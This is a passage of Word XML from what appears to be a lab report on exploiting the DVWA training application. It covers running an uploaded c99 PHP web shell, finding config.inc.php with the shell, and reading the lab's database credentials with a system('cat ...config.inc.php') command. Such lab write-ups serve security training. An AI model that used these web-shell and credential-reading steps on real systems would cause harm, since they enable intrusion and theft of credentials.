          <w:t>http://192.168.43.174/dvwa/hackable/uploads/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and were able to view the extracted </w:t>
      </w:r>
      <w:r w:rsidRPr="00C16974">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>as well as successfully execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DD555" w14:textId="1A1DC6ED" w:rsidR="00C16974" w:rsidRDefault="00192612" w:rsidP="00C16974">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03652521" wp14:editId="13C0E493">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1215390</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="152400"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="472" name="Flowchart: Alternate Process 472"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="457200" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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9B6F9" id="Flowchart: Alternate Process 472" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:95.7pt;width:36pt;height:12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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE4DD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED98F4E" wp14:editId="76E0DD83">
            <wp:extent cx="5942774" cy="1646787"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="9" name="Picture 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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5314" b="45421"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1647016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D55875" w14:textId="43D49B9E" w:rsidR="00B372B0" w:rsidRDefault="00C16974" w:rsidP="00C16974">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Executing the extracted </w:t>
      </w:r>
      <w:r w:rsidRPr="00C16974">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB07357" w14:textId="07061139" w:rsidR="00C93B99" w:rsidRDefault="00C93B99">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B182D8" w14:textId="50CD5A7F" w:rsidR="00F04F51" w:rsidRDefault="00E574A9" w:rsidP="00F04F51">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc41839634"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exploiting DVWA with the </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">99 </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1BC62EEE" w14:textId="3F0A1EE1" w:rsidR="00D45469" w:rsidRPr="00812A0E" w:rsidRDefault="00812A0E" w:rsidP="00812A0E">
      <w:r>
        <w:t xml:space="preserve">We used </w:t>
      </w:r>
      <w:r w:rsidR="00AF7331">
        <w:t>c99 shell to exploit DVWA by grabbing the</w:t>
      </w:r>
      <w:r w:rsidR="00437F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF7331">
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00732229">
        <w:t>credentials</w:t>
      </w:r>
      <w:r w:rsidR="00AF7331">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00E63662">
        <w:t>tampered with the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063912ED" w14:textId="31AA05DC" w:rsidR="001623CD" w:rsidRDefault="000622C2" w:rsidP="000622C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc41839635"/>
      <w:r>
        <w:t>Grabbing t</w:t>
      </w:r>
      <w:r w:rsidR="00812A0E">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00812A0E">
        <w:t>atabase</w:t>
      </w:r>
      <w:r w:rsidR="00437F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00732229">
        <w:t>redentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="33CFF78E" w14:textId="5DC298AA" w:rsidR="00E63662" w:rsidRPr="007F2D1D" w:rsidRDefault="00827945" w:rsidP="00E63662">
      <w:r>
        <w:t>After</w:t>
      </w:r>
      <w:r w:rsidR="009025BD">
        <w:t xml:space="preserve"> executing the c99 shell, we navi</w:t>
      </w:r>
      <w:r w:rsidR="00523950">
        <w:t xml:space="preserve">gated to </w:t>
      </w:r>
      <w:r w:rsidR="00523950" w:rsidRPr="00523950">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sec.</w:t>
      </w:r>
      <w:r w:rsidR="00523950">
        <w:t xml:space="preserve"> in the menu bar </w:t>
      </w:r>
      <w:r w:rsidR="00D53AA3">
        <w:t xml:space="preserve">and under </w:t>
      </w:r>
      <w:r w:rsidR="00D53AA3" w:rsidRPr="00D53AA3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command execute</w:t>
      </w:r>
      <w:r w:rsidR="00D53AA3">
        <w:t xml:space="preserve">, under </w:t>
      </w:r>
      <w:r w:rsidR="00D53AA3" w:rsidRPr="00D53AA3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Select:</w:t>
      </w:r>
      <w:r w:rsidR="00D53AA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00356817">
        <w:t xml:space="preserve">we chose </w:t>
      </w:r>
      <w:r w:rsidR="007416FF" w:rsidRPr="007416FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>find config.inc.php files</w:t>
      </w:r>
      <w:r w:rsidR="007F2D1D">
        <w:t xml:space="preserve"> and hit execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075B978" w14:textId="1D2597BD" w:rsidR="002709DE" w:rsidRDefault="00875109" w:rsidP="002709DE">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="463AEE06" wp14:editId="341BA8C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2514600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1341120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="209550" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Flowchart: Alternate Process 11"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="209550" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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4B00A" id="Flowchart: Alternate Process 11" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:198pt;margin-top:105.6pt;width:16.5pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>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0B9CE59A" wp14:editId="150459EA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2274570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2057400" cy="247650"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Flowchart: Alternate Process 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2057400" cy="247650"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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FEDCC" id="Flowchart: Alternate Process 6" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:110.8pt;margin-top:179.1pt;width:162pt;height:19.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0075332A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C33F3C1" wp14:editId="58F1AAE7">
            <wp:extent cx="5942965" cy="3013817"/>
            <wp:effectExtent l="0" t="0" r="635" b="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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5260" r="10070" b="13664"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6012592" cy="3049126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E3FC4" w14:textId="3A6F3006" w:rsidR="005D6E63" w:rsidRPr="009E48A0" w:rsidRDefault="002709DE" w:rsidP="002709DE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E48A0">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E48A0">
        <w:t xml:space="preserve"> - Selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="009E48A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>find config.inc.php files</w:t>
      </w:r>
      <w:r w:rsidRPr="009E48A0">
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidRPr="009E48A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sec.&gt;Select:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B2239" w14:textId="29078DA2" w:rsidR="009E48A0" w:rsidRDefault="00875109" w:rsidP="009E48A0">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26093A49" wp14:editId="62F26E7D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2184400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1600200" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Flowchart: Alternate Process 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1600200" cy="190500"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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66D30" id="Flowchart: Alternate Process 4" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:172pt;width:126pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D45469">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05184D03" wp14:editId="545A3C15">
            <wp:extent cx="5942965" cy="3311597"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5199" r="29786" b="25245"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5954311" cy="3317919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="713EB27A" w14:textId="704EEBB8" w:rsidR="00D45469" w:rsidRPr="005D6E63" w:rsidRDefault="009E48A0" w:rsidP="000E6B8B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Copying the outcome of the p</w:t>
      </w:r>
      <w:r w:rsidR="000E6B8B">
        <w:t>reviou</w:t>
      </w:r>
      <w:r>
        <w:t>s command executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE48E6" w14:textId="4497FF61" w:rsidR="006A7695" w:rsidRDefault="00FE3967" w:rsidP="00387E53">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the execution of the command, we could see the output presented in the above screenshot. We copied</w:t>
      </w:r>
      <w:r w:rsidR="00B57752">
        <w:t xml:space="preserve"> the highlighted </w:t>
      </w:r>
      <w:r w:rsidR="00B57752" w:rsidRPr="00B57752">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/var/www/html/dvwa/config/config.inc.php</w:t>
      </w:r>
      <w:r w:rsidR="008D0EC7">
        <w:t xml:space="preserve">. Then we navigated to </w:t>
      </w:r>
      <w:r w:rsidR="008D0EC7" w:rsidRPr="008D0EC7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PHP-code</w:t>
      </w:r>
      <w:r w:rsidR="008D0EC7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0EC7">
        <w:t>and pasted</w:t>
      </w:r>
      <w:r w:rsidR="00923A12">
        <w:t xml:space="preserve"> what we had copied, then added </w:t>
      </w:r>
      <w:r w:rsidR="00D218EC">
        <w:t xml:space="preserve">an extra bit </w:t>
      </w:r>
      <w:r w:rsidR="00832270">
        <w:t>to execute the following command</w:t>
      </w:r>
      <w:r w:rsidR="00BF245C">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008D2018" w:rsidRPr="008D2018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>system("cat /var/www/html/dvwa/config/config.inc.php");</w:t>
      </w:r>
      <w:r w:rsidR="009841B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009841B1">
        <w:t xml:space="preserve">and hit </w:t>
      </w:r>
      <w:r w:rsidR="009841B1" w:rsidRPr="009841B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r w:rsidR="009841B1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A4174F">
        <w:t xml:space="preserve"> The screenshot below </w:t>
      </w:r>
      <w:r w:rsidR="00E9045C">
        <w:t xml:space="preserve">is the output we </w:t>
      </w:r>
      <w:r w:rsidR="00BD7E9F">
        <w:t>achieved. The highlighted information provide</w:t>
      </w:r>
      <w:r w:rsidR="009A51B9">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BD7E9F">
        <w:t xml:space="preserve"> us crucial details about the</w:t>
      </w:r>
      <w:r w:rsidR="00437F80">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="009A51B9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F84316" w14:textId="6B0EF0B9" w:rsidR="00157F4B" w:rsidRDefault="006A7695" w:rsidP="00157F4B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database Name: </w:t>
      </w:r>
      <w:r w:rsidR="00157F4B">
        <w:t>dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380324BB" w14:textId="42E04B33" w:rsidR="00415BA5" w:rsidRDefault="00437F80" w:rsidP="00415BA5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Database User</w:t>
      </w:r>
      <w:r w:rsidR="00415BA5">
        <w:t>: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6A9B2" w14:textId="2D24310E" w:rsidR="007F1658" w:rsidRDefault="007F1658" w:rsidP="00205C9B">
      <w:r>
        <w:t>Database Password: toor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28094E87" w14:textId="4C16AE27" w:rsidR="000E6B8B" w:rsidRDefault="009D7890" w:rsidP="000E6B8B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18865517" wp14:editId="5C9FC1F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2261235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1314450" cy="390525"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="13" name="Flowchart: Alternate Process 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1314450" cy="390525"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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4FEC7" id="Flowchart: Alternate Process 13" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:178.05pt;width:103.5pt;height:30.75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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0072266C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD10A42" wp14:editId="3927DAB0">
            <wp:extent cx="5857875" cy="3409049"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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8 (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-16" t="5280" r="29761" b="22032"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5879869" cy="3421848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FBEA4" w14:textId="6E601AB8" w:rsidR="00700E82" w:rsidRDefault="000E6B8B" w:rsidP="005A5C2B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Gra</w:t>
      </w:r>
      <w:r w:rsidR="005A5C2B">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>bing database crucial information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682C7C7" w14:textId="460E3852" w:rsidR="00184F27" w:rsidRDefault="00184F27">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
